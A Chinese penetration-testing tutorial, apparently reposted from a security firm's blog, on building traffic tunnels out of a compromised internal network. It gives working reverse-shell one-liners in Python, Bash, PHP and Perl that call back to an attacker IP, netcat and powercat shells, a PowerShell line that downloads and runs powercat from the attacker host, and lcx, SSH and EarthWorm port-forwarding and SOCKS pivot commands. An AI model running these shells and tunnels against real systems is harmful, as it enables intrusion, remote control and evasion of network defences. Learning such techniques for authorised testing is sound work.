• 内网穿透中流量隧道的选择问题

    渗透测试人员完成了内网信息收集工作后,往往需要判断流量数据的上传与外带,即“出的去,进得来”,所以选择一个合理的,稳定的,安全性相对较高的隧道进行通信尤为重要。

    关于通信隧道的定义,我们不妨借用MS08067团队的描述:

    “隧道就是一种绕过端口屏蔽的通信方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包达到目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。”

    本文适用于进行内网漫游初期的测试人员以及想要有所研究的爱好者,知识的运用前提是在“拿到对方内网一台机器的shell”的情况下(不论是一般的webshell,sqlmap的osshell,亦或是meterpreter的shell理论上都可)。要按照渗透阶段分类,算属于 “内网信息收集”的后一步,“后渗透”的前一步——毕竟本文讲的是“皮”的构造问题,如果这个桥梁没搭建好,后渗透的“毛”又该如何焉附?

    笔者将以“如何判断内网各个隧道的连通性”与“各个隧道的利用方式”两个板块进行展开,相对细致的讲解在内网穿透中我们该如何利用合适的流量隧道进行通信与数据的传输。

    如无特殊说明,笔者规定:

    
    
    <span class="mf">192.168.1.11</span><span class="o">-&gt;</span><span class="err">攻击端</span>
    <span class="mf">192.168.1.12</span><span class="o">-&gt;</span><span class="err">目标端</span>
    <span class="mf">192.168.1.13</span><span class="o">-&gt;</span><span class="err">中间(跳板)端</span>

    一、判断内网连通性

    • 常用隧道列举:
    VPS教程
    • ICMP协议
    
    
    <span class="n">ping</span> <span class="n">baidu</span><span class="p">.</span><span class="n">com</span> <span class="o">//</span><span class="err">如果收到了传回来的包则说明同时证明了发送和接收</span>
    • TCP协议
    
    
    <span class="n">nc</span> <span class="o">-</span><span class="n">zv</span> <span class="mf">192.168.1.3</span> <span class="mi">80</span>
    • HTTP协议
    
    
    <span class="n">curl</span> <span class="n">www</span><span class="p">.</span><span class="n">baidu</span><span class="p">.</span><span class="nl">com</span><span class="p">:</span><span class="mi">80</span>
    • DNS协议
    
    
    <span class="n">nslookup</span> <span class="n">www</span><span class="p">.</span><span class="n">baidu</span><span class="p">.</span><span class="n">com</span>
    <span class="n">dig</span> <span class="n">www</span><span class="p">.</span><span class="n">baidu</span><span class="p">.</span><span class="n">com</span> <span class="n">A</span> <span class="o">//</span><span class="n">Linux</span>

    还有种情况流量也流不出去,及办公网统一设置代理服务器上网,那么本机直连自然连不到外边——解决方法:
    1、看一下本机是否与内网其他机器(代理服务器)有端口连接
    2、看一下内网有没有名为类似proxy的机器
    3、可以直接看IE等软件的代理设置
    4、根据pac文件的路径确认
    5、利用curl进行测试

    
    
    <span class="n">curl</span> <span class="n">www</span><span class="p">.</span><span class="n">baidu</span><span class="p">.</span><span class="n">com</span> <span class="c1">//不通
    </span><span class="c1"></span><span class="n">curl</span> <span class="o">-</span><span class="n">x</span> <span class="n">proxy</span><span class="o">-</span><span class="nl">ip</span><span class="p">:</span><span class="n">port</span> <span class="n">www</span><span class="p">.</span><span class="n">baidu</span><span class="p">.</span><span class="n">com</span> <span class="o">//</span><span class="err">通</span>

    二、网络隧道的选择

    1、网络层

    • IPv6(待研究)

    IPv6是以IPv4隧道为载体,将自己封装在IPv4的包中发送。当目标机器收到以后,会先解封装众多IPv4包(顺便解了包在IPv6外面的那层IPv4的壳),然后识别IPv6报文。

    • ICMP
    VPS教程

    2、传输层

    lcx端口转发与映射

    • 直接进行端口上的转发

    异同:

    端口转发是个动作,而端口映射是个规则。转发的一系列动作中有的动作或许会按照映射的规则来进行。

    lcx端口映射

    
    
    <span class="c1">//只是建立一个映射规则
    </span><span class="c1"></span><span class="n">lcx</span> <span class="o">-</span><span class="n">tran</span> <span class="mi">53</span> <span class="mf">192.168.1.12</span><span class="p">(</span><span class="err">本机</span><span class="n">IP</span><span class="p">)</span> <span class="mi">3389</span>

    lcx端口转发

    
    
    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">lcx</span> <span class="o">-</span><span class="n">listen</span> <span class="mi">4444</span> <span class="mi">5555</span> <span class="c1">//将4444端口收到的信息转发到5555上(相当于建立了个简易映射)
    </span><span class="c1"></span>
    <span class="c1">//目标端
    </span><span class="c1"></span><span class="n">lcx</span> <span class="o">-</span><span class="n">slave</span> <span class="mf">192.168.1.11</span><span class="p">(</span><span class="err">攻击端</span><span class="n">IP</span><span class="p">)</span> <span class="mi">4444</span> <span class="mf">127.0.0.1</span> <span class="mi">3389</span> <span class="o">//</span><span class="err">将本机的</span><span class="mi">3389</span><span class="err">转发到攻击端的</span><span class="mi">4444</span><span class="err">上</span>

    nc

    • 使用TCP/UDP进行数据传输

    一般使用就是:

    
    
    nc 192.168.1.12 3434 //目标端请求端口连接
    nc -lvp 3434 //攻击端监听固定端口

    参数:

    
    
    -c &#034;&#034;  Executes the given command via /bin/sh //在给定机器上执行上一个服务器所执行的命令,做跳板代理服务器时使用
     
    -d   后台运行,常用于后门建立过程
    -e   程序重定向,常用于后门建立过程
    -g gateway  设置网关,常用于突破内网限制,最多8个
    -G num  路由跳数,值为4的倍数
    -i sec  设置发送每一行数据的时间间隔
    -l  设置netcat处于监听状态等待连接
    -L 设置netcat处于监听状态等待连接,当客户端断开,服务端依旧回到等待状态
    -n 直接使用IP地址,不进行DNS解析
    -o file 输出文件,并转换为十六进制保存在文件中
    -p port 设置本地监听的端口号
    -r  随机设定本地主机与远程主机的通信端口
    -s addr 设置本地发出去数据包的IP地址
    -t 回复telnet的请求数据包
    -u 设置netcat使用UDP模式
    -v 显示错误提示信息
    -w secs  设置连接超时秒数
    -z 将输入输出功能关闭,只在扫描通信时候用

    端口扫描:

    
    
    <span class="n">nc</span> <span class="o">-</span><span class="n">v</span> <span class="mf">192.168.1.12</span> <span class="mi">80</span> <span class="c1">//对80端口进行开放探测
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">z</span> <span class="o">-</span><span class="n">v</span> <span class="mf">192.168.1.12</span> <span class="mi">233</span><span class="o">-</span><span class="mi">2333</span> <span class="o">//</span><span class="err">对一个端口范围进行探测,但是速度有点慢</span>

    文件传输:

    
    
    <span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span> <span class="o">&gt;</span><span class="mf">1.</span><span class="n">txt</span> <span class="c1">//接收端执行,会先建立一个1.txt的空文档,日后填数据
    </span><span class="c1"></span>
    <span class="n">nc</span> <span class="o">-</span><span class="n">vn</span> <span class="mf">192.168.1.12</span> <span class="mi">8888</span> <span class="o">&lt;</span> <span class="mf">1.</span><span class="n">txt</span> <span class="o">//</span><span class="err">发送端执行</span>

    做跳板:

    
    
    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//目标端
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span> <span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">sh</span>

    <span class="c1">//跳板端
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">v</span> <span class="mf">192.168.1.11</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">c</span> <span class="s">&#034;nc -v 192.168.1.12 8888&#034;</span>
    • 正向shell

    即接收端设置了自己的shell重定向,攻击端只连接就可以了

    
    
    <span class="c1">//目标端
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">e</span> <span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">sh</span> <span class="c1">//Linux
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">e</span> <span class="nl">C</span><span class="p">:</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">system32</span><span class="err">\</span><span class="n">cmd</span><span class="p">.</span><span class="n">exe</span> <span class="c1">//windows
    </span><span class="c1"></span>
    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">nc</span> <span class="mf">192.168.1.12</span> <span class="mi">8888</span>
    • 反向shell

    即攻击端连接时将自己的shell重定向发送过去,接收端只监听就可以了

    
    
    <span class="c1">//目标端
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">nc</span> <span class="mf">192.168.1.12</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">e</span> <span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">sh</span>

    其他shell获取途径

    往往目标机是没有nc的,所以有其他几种不用nc来反向shell途径。

    • python
    
    
    <span class="c1">//攻击端开启nc监听
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//目标机执行
    </span><span class="c1"></span><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="err">&#039;</span><span class="n">import</span> <span class="n">socket</span><span class="p">,</span><span class="n">subprocess</span><span class="p">,</span><span class="n">os</span><span class="p">;</span><span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">);</span><span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="s">&#034;192.168.1.11&#034;</span><span class="p">,</span><span class="mi">8888</span><span class="p">));</span><span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">);</span><span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">);</span><span class="n">os</span><span class="p">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">);</span><span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">call</span><span class="p">([</span><span class="s">&#034;/bin/sh&#034;</span><span class="p">,</span><span class="s">&#034;-i&#034;</span><span class="p">]);</span><span class="err">&#039;</span>
    • Bash

    根据Bash的[[Linux知识#0x0B 重定向符]]重定向shell至攻击端

    
    
    <span class="c1">//攻击端开启nc监听
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//目标机执行
    </span><span class="c1"></span><span class="n">bash</span> <span class="o">-</span><span class="n">i</span> <span class="o">&gt;&amp;</span> <span class="o">/</span><span class="n">dev</span><span class="o">/</span><span class="n">tcp</span><span class="o">/</span><span class="mf">192.168.1.11</span><span class="o">/</span><span class="mi">8888</span> <span class="mi">0</span><span class="o">&gt;&amp;</span><span class="mi">1</span> <span class="o">//-</span><span class="n">i代表打开一个交互式bash</span> <span class="n">shell</span>
    • PHP反向shell
    
    
    <span class="c1">//攻击端开启nc监听
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//目标机执行
    </span><span class="c1"></span><span class="n">php</span> <span class="o">-</span><span class="n">r</span> <span class="err">&#039;$</span><span class="n">sock</span><span class="o">=</span><span class="n">fsockopen</span><span class="p">(</span><span class="s">&#034;192.168.1.11&#034;</span><span class="p">,</span><span class="mi">8888</span><span class="p">);</span><span class="n">exec</span><span class="p">(</span><span class="s">&#034;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&#034;</span><span class="p">);</span><span class="err">&#039;</span>
    • Perl
    
    
    <span class="c1">//攻击端开启nc监听
    </span><span class="c1"></span><span class="n">nc</span> <span class="o">-</span><span class="n">lvp</span> <span class="mi">8888</span>

    <span class="c1">//目标机执行
    </span><span class="c1"></span><span class="n">perl</span> <span class="o">-</span><span class="n">e</span> <span class="err">&#039;</span><span class="n">use</span> <span class="n">Socket</span><span class="p">;</span><span class="err">$</span><span class="n">i</span><span class="o">=</span><span class="s">&#034;192.168.1.11&#034;</span><span class="p">;</span><span class="err">$</span><span class="n">p</span><span class="o">=</span><span class="mi">8888</span><span class="p">;</span><span class="n">socket</span><span class="p">(</span><span class="n">S</span><span class="p">,</span><span class="n">PF_INET</span><span class="p">,</span><span class="n">SOCK_STREAM</span><span class="p">,</span><span class="n">getprotobyname</span><span class="p">(</span><span class="s">&#034;tcp&#034;</span><span class="p">));</span><span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">S</span><span class="p">,</span><span class="n">sockaddr_in</span><span class="p">(</span><span class="err">$</span><span class="n">p</span><span class="p">,</span><span class="n">inet_aton</span><span class="p">(</span><span class="err">$</span><span class="n">i</span><span class="p">)))){</span><span class="n">open</span> <span class="p">(</span><span class="n">STDIN</span><span class="p">,</span><span class="s">&#034;&gt;&amp;S&#034;</span><span class="p">);</span><span class="n">open</span><span class="p">(</span><span class="n">STDOUT</span><span class="p">,</span><span class="s">&#034;&gt;&amp;S&#034;</span><span class="p">);</span><span class="n">open</span><span class="p">(</span><span class="n">STDERR</span><span class="p">,</span><span class="s">&#034;&gt;&amp;S&#034;</span><span class="p">);</span><span class="n">exec</span><span class="p">(</span><span class="s">&#034;/bin/sh&#034;</span><span class="p">);};</span><span class="err">&#039;</span>

    powercat

    • powercat相当于powershell的版的nc,有自己的优点

    弹回powershell:

    
    
    <span class="c1">//在目标机上下载powercat
    </span><span class="c1"></span><span class="n">IEX</span> <span class="p">(</span><span class="n">New</span><span class="o">-</span><span class="n">Object</span> <span class="n">Net</span><span class="p">.</span><span class="n">WebClient</span><span class="p">).</span><span class="n">Downloading</span><span class="p">(</span><span class="err">&#039;</span><span class="nl">http</span><span class="p">:</span><span class="c1">//192.168.1.11/powercat.ps1&#039;)
    </span><span class="c1"></span>
    <span class="err">然后执行</span>
    <span class="n">powercat</span> <span class="o">-</span><span class="n">l</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">v</span>

    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">powercat</span> <span class="o">-</span><span class="n">c</span> <span class="mf">192.168.1.12</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">v</span> <span class="o">-</span><span class="n">ep</span>

    传文件:

    
    
    <span class="c1">//接收端
    </span><span class="c1"></span><span class="n">powercat</span> <span class="o">-</span><span class="n">l</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">of</span> <span class="mf">1.</span><span class="n">txt</span> <span class="o">-</span><span class="n">v</span>

    <span class="c1">//发送端
    </span><span class="c1"></span><span class="n">powercat</span> <span class="o">-</span><span class="n">c</span> <span class="mf">192.168.1.12</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">i</span> <span class="nl">C</span><span class="p">:</span><span class="err">\</span><span class="mf">1.</span><span class="n">txt</span> <span class="o">-</span><span class="n">v</span> <span class="o">//-</span><span class="n">i的这个输入可以写字符串</span><span class="err">,也可以写文件名</span>

    做跳板:

    
    
    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">nc</span> <span class="mf">192.168.1.13</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">vv</span> <span class="c1">//这里写跳板ip
    </span><span class="c1"></span>
    <span class="c1">//目标端
    </span><span class="c1"></span><span class="n">powercat</span> <span class="o">-</span><span class="n">l</span> <span class="o">-</span><span class="n">v</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">e</span> <span class="n">cmd</span><span class="p">.</span><span class="n">exe</span>

    <span class="c1">//跳板端
    </span><span class="c1"></span><span class="n">powercat</span> <span class="o">-</span><span class="n">l</span> <span class="o">-</span><span class="n">v</span> <span class="o">-</span><span class="n">p</span> <span class="mi">8888</span> <span class="o">-</span><span class="n">r</span> <span class="nl">tcp</span><span class="p">:</span><span class="mf">192.168.1.12</span><span class="o">:</span><span class="mi">8888</span><span class="o">/</span>

    3、应用层

    ssh协议

    参见:SSH的三种端口转发

    一般用法:

    
    
    ssh root@192.168.1.1

    参数如下:

    
    
    -C  压缩传输,提高传输速度
    -f  将SSH转入后台运行,不占用当前shell
    -N  建立静默连接(建立了连接,但是看不到具体会话)
    -g  允许远程主机连接本地用于端口转发
    -L  本地端口转发
    -R  远程端口转发
    -D  动态转发(SOCKS代理)
    -P  指定SSH端口

    假设有以下环境,攻击端为VPS,目标端为数据库服务器,跳板为Web服务器:

    VPS教程

    端口转发:

    • 本地端口转发
    
    
    <span class="c1">//攻击端(下面这个是一行命令)执行这个就直接完事了(执行完会让你输一下跳板机密码)
    </span><span class="c1"></span><span class="n">ssh</span> <span class="o">-</span><span class="n">CfNg</span> <span class="o">-</span><span class="n">L</span> <span class="mi">8888</span><span class="o">:</span><span class="mf">1.1.1.10</span><span class="o">:</span><span class="mi">3389</span><span class="err">(</span><span class="nl">VPS端口</span><span class="p">:</span><span class="err">目标主机</span><span class="o">:</span><span class="err">目标端口)</span> <span class="n">root</span><span class="err">@</span><span class="mf">192.168.1.11</span>
    <span class="c1">//相当于是通过最后的这个跳板ip,将前面的目标 ip:端口 转发到本地的8888上
    </span><span class="c1"></span>
    <span class="c1">//可以用下面这个确定连接
    </span><span class="c1"></span><span class="n">netstat</span> <span class="o">-</span><span class="n">tulnp</span> <span class="o">|</span> <span class="n">grep</span> <span class="s">&#034;8888&#034;</span>

    <span class="c1">//攻击端,因为连接的是3389的远程桌面服务,所以我们可以用rdesktop来启动
    </span><span class="c1"></span><span class="n">rdesktop</span> <span class="mf">127.0.0.1</span><span class="o">:</span><span class="mi">8888</span>

    本地转发是直接将目标机的端口数据转发到攻击端端口。

    • 远程转发
    
    
    <span class="c1">//跳板上,和本地不同的是,参数与转发对象
    </span><span class="c1"></span><span class="n">ssh</span> <span class="o">-</span><span class="n">CfNg</span> <span class="o">-</span><span class="n">R</span> <span class="mi">8888</span><span class="o">:</span><span class="mf">1.1.1.10</span><span class="o">:</span><span class="mi">3389</span><span class="err">(</span><span class="nl">VPS端口</span><span class="p">:</span><span class="err">目标主机</span><span class="o">:</span><span class="err">目标端口)</span> <span class="n">root</span><span class="err">@</span><span class="mf">192.168.1.4</span>
    <span class="c1">//相当于是将后面攻击端ip的8888端口流量转发到目标端的 ip:端口 ,然后访问本地的8888,相当于访问对面的3389
    </span><span class="c1"></span>

    <span class="c1">//攻击端,同样因为连接的是3389的远程桌面服务,所以我们可以用rdesktop来启动
    </span><span class="c1"></span><span class="n">rdesktop</span> <span class="mf">127.0.0.1</span><span class="o">:</span><span class="mi">8888</span>

    远程转发是在跳板端建立一个监听端口(此端口未知),之后所有访问目标端特定端口(3389)的数据都会通过跳板机的那个监听端口返回给攻击端的特定端口(8888)。

    • 与SOCKS结合的动态转发

    相对于本地转发和远程转发的单一端口转发模式而言,动态转发有点更加强劲的端口转发功能,即是无需固定指定被访问目标主机的端口号。这个端口号需要在本地通过协议指定,该协议就是简单、安全、实用的 SOCKS 协议。 动态转发通过参数 -D 指定,格式:-D [本地主机:]本地主机端口。相对于前两个来说,动态转发无需再指定远程主机及其端口。它们由通过 SOCKS协议 连接到本地主机端口的那个主机。 举例:ssh -D 50000 user@host1。这条命令创建了一个SOCKS代理,所以通过该SOCKS代理发出的数据包将经过host1转发出去。

    
    
    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="n">ssh</span> <span class="o">-</span><span class="n">CfNg</span> <span class="o">-</span><span class="n">D</span> <span class="mi">8888</span> <span class="n">root</span><span class="err">@</span><span class="mf">192.168.1.11</span>

    然后再在浏览器端设置SOCKS5代理:127.0.0.1:8888

    这个时候就可以在浏览器上访问内网的所有IP了

    HTTP协议

    • reGeorg

    DNS

    • 内外DNS解析概念:首先,内部是可以建立域的,但如果建立的域名与外网域名相冲突,那么采用的DNS解析是以内部DNS服务器为主的。就像是添加host,如果内部的DNS有自己的想法,就先用内部自己的解析,如果没有再采用外网的DNS服务器。
    • 内部的好处是响应速度快,但是更新会有问题,外部的更新不存在问题,但有时候会拥堵。
    VPS教程

    DNS隧道木马的通信框架如下:

    VPS教程
    • 一般隧道通信就是直接通过被控机来进行,但是DNS隧道是通过内网内的DNS服务器来作为中转来进行的,其他协议都封装在了DNS协议中去传输

    查看DNS的连通性

    • 要做的是确保目标端是否与内部DNS服务器连通,且内部域名与外部域名都能解析
    
    
    <span class="n">cat</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">resolv</span><span class="p">.</span><span class="n">conf</span> <span class="o">|</span> <span class="n">grep</span> <span class="o">-</span><span class="n">v</span> <span class="sc">&#039;#&#039;</span> <span class="c1">//resolv.conf是Linux里本机的DNS配置,可以看到本机当前网络环境的域名及IP
    </span><span class="c1"></span>
    <span class="c1">//检测内部域名是否可以解析,假设上一步得到网络环境的域名为subdomain.domain
    </span><span class="c1"></span><span class="n">nslookup</span> <span class="n">subdomain</span><span class="p">.</span><span class="n">domain</span> <span class="c1">//正常返回解析结果说明连通
    </span><span class="c1"></span>
    <span class="c1">//检测外部域名是否可以解析
    </span><span class="c1"></span><span class="n">nslookup</span> <span class="n">baidu</span><span class="p">.</span><span class="n">com</span> <span class="o">//</span><span class="err">正常返回解析结果说明连通</span>

    dnscat2

    • 因为都要购买域名,待补充,参见:Powershell+Dnscat2实现DNS隐蔽隧道反弹Shell

    SOCKS代理

    • 很多协议都有代理服务,代理功能很强大,可以直接简单的将一段系统连接到另一端。
    • SOCKS监听的是1080端口。

    SOCKS代理与HTTP代理区别:

    HTTP,HTTPS,但是这几个都属于应用层,而SOCKS代理属于传输层,所以比其他几个都要快一些。

    SOCKS代理与VPN区别:

    SOCKS代理只是充当一个转发作用,发送到目标端时的源IP还是你自己的。 VPN代理会让你加入一个专有网络,专有网络会给你分配人家的私有IP,发送到目标端时IP就不是你自己的了。

    ew

    全名EarthWorm,项目地址:github.com/rootkiter/Ea

    新版本叫Termite,项目地址:github.com/rootkiter/Te

    • 要想使用这个工具所建立SOCKS隧道,必须在那个机器上上传ew
    VPS教程
    • 正向SOCKS5
    
    
    <span class="c1">//目标端,目标端必须有一个公网IP
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">ssocksd</span> <span class="o">-</span><span class="n">l</span> <span class="mi">8888</span>

    <span class="c1">//攻击端
    </span><span class="c1"></span><span class="err">因为知道目标端</span><span class="n">IP</span><span class="err">,所以使用</span><span class="n">SocksCap64</span><span class="err">、</span><span class="n">Proxifier等代理工具进行连接</span>
    • 反向SOCKS5
    
    
    <span class="c1">//目标机器没有公网IP
    </span><span class="c1">//攻击端,在攻击端建立一个SOCKS隧道,并且将1008端口收到的信息(攻击端发出的信息),转发的888端口
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">rcsocks</span> <span class="o">-</span><span class="n">l</span> <span class="mi">1008</span> <span class="o">-</span><span class="n">e</span> <span class="mi">888</span>

    <span class="c1">//目标端,在目标端也建立一个SOCKS隧道,然后反弹到提供的IP的端口上,至此隧道搭建成功
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">rssocks</span> <span class="o">-</span><span class="n">d</span> <span class="mf">192.168.1.11</span> <span class="o">-</span><span class="n">e</span> <span class="mi">888</span>

    <span class="o">//</span><span class="err">这个时候我们访问攻击端的</span><span class="mi">1008</span><span class="err">端口,即可享受目标端的网络环境了</span>
    • 二级网络,情况一:
    VPS教程

    被控中间端有公网IP,直接做一个端口转发,攻击端就可以直接访问了 需要使用lcx_tran功能

    
    
    <span class="c1">//目标端(B主机)启动SOCKS隧道
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">ssocksd</span> <span class="o">-</span><span class="n">l</span> <span class="mi">888</span>

    <span class="c1">//不能算是攻击端(A主机),启动SOCKS隧道并将1080端口收到的数据转发到888端口中
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">lcx_tran</span> <span class="o">-</span><span class="n">l</span> <span class="mi">1080</span> <span class="o">-</span><span class="n">f</span> <span class="mf">10.48.128.25</span> <span class="o">-</span><span class="n">g</span> <span class="mi">888</span>

    <span class="o">//</span><span class="mf">10.48.128.25</span><span class="err">是</span><span class="n">A主机的公网IP</span><span class="err">,我们只要访问这个</span><span class="n">IP的1080端口</span><span class="err">,即可访问</span><span class="n">B主机的内网环境</span>
    • 二级网络,情况二:
    VPS教程

    被控中间端没公网IP,只能主动访问外部攻击端 需要使用lcx_listen与lcx_slave功能

    
    
    <span class="c1">//攻击端,建立SOCKS隧道,并将1080端口数据转发至888
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">lcx_listen</span> <span class="o">-</span><span class="n">l</span> <span class="mi">1080</span> <span class="o">-</span><span class="n">e</span> <span class="mi">888</span>

    <span class="c1">//目标端(B主机),启用SOCKS隧道
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">ssocksd</span> <span class="o">-</span><span class="n">l</span> <span class="mi">999</span>

    <span class="c1">//中间端(A主机),牵线搭桥作用,将攻击端的888与目标端的999连接起来,至此SOCKS5隧道搭建成功
    </span><span class="c1"></span><span class="n">ew</span> <span class="o">-</span><span class="n">s</span> <span class="n">lcx_slave</span> <span class="o">-</span><span class="n">d</span> <span class="mf">139.</span><span class="o">*</span><span class="p">.</span><span class="o">*</span><span class="mf">.113</span> <span class="o">-</span><span class="n">e</span> <span class="mi">888</span> <span class="o">-</span><span class="n">f</span> <span class="mf">10.48.128.49</span> <span class="o">-</span><span class="n">g</span> <span class="mi">999</span>

    <span class="o">//</span><span class="err">访问攻击端的</span><span class="mi">1080</span><span class="err">,即可享受</span><span class="n">B主机的内网环境</span>
    • 三级网络需要使用lcx_listen、lcx_slave与反向连接的rcsocks、rssocks相结合,在此不详解。

    本文由思而听网络科技有限公司-渗透部门:Resek4 原创编写,转载请告知我们。也同时欢迎阅读这篇文章的你加入思而听安全团队,和更多大佬们交流技术干货喔~

    原创文章,转载请注明: 转载自指南者

    本文链接地址: 内网穿透中流量隧道的选择问题



  • + 华为 FreeBuds Pro 使用体验
  • + 如何看待江苏常州警方为营救轻生男子拉下电闸,附近老人因呼吸机断电死亡?
  • + PayPal注册教程:手把手教你注册大陆PayPal
  • + 总结操作国外lead任务不加钱的一些原因
  • + 本地计算发展到网络计算,到现在的云计算,同时操作系统也在不断变化。不同的计算环境下,操作系统有何区别?
  • + 我购买nord已经有一段时间了,经常出现无法连接的现象,该怎么操作?
  • + 买云服务器有推荐吗?国内知道有腾讯云、阿里云。。。等等,不知道该选哪个好了,另外优惠吗》
  • + 亚马逊账号关联怎么避免?
  • + 求拨号vps adsl的 哪家好?不是土豪,性价比高的求推荐?
  • + 2020年9月,现在做亚马逊测评,使用VPS会被风控吗?
  • + 买云服务器有推荐吗?国内知道有腾讯云、阿里云。。。等等,不知道该选哪个好了,另外优惠吗》
  • + 新人学生党,如何充分利用云服务器?

评论

你必须先登录